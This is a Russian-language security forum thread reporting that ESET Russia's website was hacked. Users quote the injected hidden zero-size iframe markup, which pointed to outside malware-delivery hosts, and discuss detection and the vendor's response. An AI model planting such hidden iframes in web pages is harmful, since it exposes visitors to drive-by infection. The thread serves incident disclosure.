Сайт Eset Russia заражен? - Общий форум по информационной безопасности - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

Umnik

На http://esetnod32.ru/ висит скрытый фрейм:

</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe></html>

Говорят, минимум второй день висит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ALEX(XX)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
EzzO

ой ой ой, сайт антивирусной компании заражен, как-то правильно. Куда смотрят смотрящие?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

iFrame я больше не вижу на странице.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller

Уже значит убрали.

Сейчас они типа расследование будут проводить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

ага

По данному инциденту в настоящее время проводится проверка.

вот интересно - а взламывали ли сайты других вендоров??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller
вот интересно - а взламывали ли сайты других вендоров??

Конечно, вот например сайт антивируса Панды и не один раз.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

Конечно, вот например сайт антивируса Панды и не один раз.
и там тоже подсаживали трояна?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

Жесть ваще....Заговор внутри компании? ))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Жесть ваще....Заговор внутри компании? ))

м.б типичное разгильдяйство?..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
м.б типичное разгильдяйство?..

Это, скорее всего, уже как следствие! )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Ну должен же их "давно и в муках искавшийся" российский вирусный аналитик, широко известный в узких кругах "летун отовсюду", г-н Матросов, с чего-то начинать на новом месте ? :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Антивирусы реагируют?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

У меня при переходе по ссылке ТЕХНИЧЕСКИЙ ФОРУМ переходит на viruslab.ru - Антивирус Панды...Может они и взломали?! ))))

Ваще жесть....дааааааа

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Форум anti-malware.ru атакован спамерами?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Форум anti-malware.ru атакован спамерами?

Это почему?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Ну по моим личным наблюдениям сложилось такое мнение :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А сайт до сих пор инфицирован...уже и письмо им написал, и позвонил....Без толку!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Danilka
Антивирусы реагируют?

KIS 2010 да.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А НОД не реагирует! ((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Fox

Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Остаётся только задуматься!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • santy
      Есть цепочка запуска: Есть цепочка запуска по образу, полученному с отслеживанием версией 4.99.6 https://imgur.com/xSA79Bm    
    • PR55.RP55
      "Использование групповой политики для удаленной установки программного обеспечения..." Возможно есть смысл информировать Оператора, что такая политика существует.    
    • demkd
      ---------------------------------------------------------
       4.99.7
      ---------------------------------------------------------
       o В окно истории процессов добавлен новый фильтр.
         Активировать его можно в контекстном меню процесса с помощью пункта "Отобразить цепочку запуска процесса".
         В результате в списке останется лишь текущий процесс и все его предки вплоть до SYSTEM.
         Фильтр имеет средний приоритет, т.е. фильтр на родительский процесс имеет высший приоритет, затем идет
         этот фильтр, затем фильтр по строке происка. Отмена фильтров по ESC происходит в обратном порядке
         в соответствии с их приоритетом.
         (!) В истории процессов 64-х битных систем рекомендуется обращать внимание на запуск 32-х битного cmd.exe
         (!) часто это является признаком зловредной активности.

       o В лог добавлено предупреждение при обнаружении отладчика/блокировки запуска/монитора завершения приложения.
         В лог выводится исходное значение параметров Debugger и MonitorProcess.
         Таким образом сразу будет видно если известные файлы были использованы для блокировки запуска процессов
         или неявного запуска несистемных процессов.

       o Твики #35 обновлен, теперь он называется: "Очистить ключи IFEO и SilentProcessExit".
         Теперь в лог выводятся все удаленные параметры или имя ключа с ошибкой удаления параметра.

       o Изменено название статуса "Исключение" на "Defender_Исключение".

       o Изменен префикс названия объекта "WD_Exclusion:" на "WDE:".

       o Исключения дефендера теперь могут быть удалены лишь в ручном режиме.

       o Исправлена ошибка в парсере json.

       o Исправлена ошибка "...не найден в списке" при удалении некоторых исключений Defender-а скриптовой командой.
       
    • demkd
      причина сбоев в том что пользователь включает опасные флаги при запуске, в частности заморозку потоков или выгрузку DLL. да Работать с образом нужно в той локализации, с которой был сделан образ, иначе будут проблемы.
    • PR55.RP55
      + Нюанс... Есть образ втозапуска созданный в\на англицкой версии uVS И если отдать команду: Запретить запуск файла (по хешу) то получим: (!) Не удалось получить размер файла C:\USERS\USER\APPDATA\LOCAL\PROTECTBROWSER\PROTECTBROWSER.EXE так как в Инфо:  Size 812544 bytes Правда при чём тут размер файла ? https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=130161&action=download  
×